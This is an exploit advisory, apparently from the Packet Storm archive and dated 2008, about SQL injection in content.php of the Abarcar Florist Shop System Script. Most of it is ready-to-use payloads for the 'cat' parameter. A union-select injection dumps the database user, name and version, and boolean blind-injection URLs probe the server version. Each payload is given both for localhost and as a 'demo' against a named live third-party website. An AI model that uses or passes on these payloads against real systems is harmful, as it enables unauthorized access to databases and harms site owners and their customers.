Abarcar Florist Shop System Script suffers from remote and blind SQL injection vulnerabilities in content.php.
5ae4201515142013f2ab197bbdcdaec6[~] abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj
[~]
[~] script: http://www.abarcar.com/content_18.php
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Date: 31.12.2008
[~]
[~] Home: www.z0rlu.blogspot.com / www.experl.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
Exploit: ( remote )
http://localhost/script_path/content.php?cat=[SQL]
[SQL]=
-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
exploit for demo: ( you must look title )
http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--
Exploit: ( blind )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
exploit for demo:
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )
https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )
[~]----------------------------------------------------------------------
[~] Greetz tO: yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!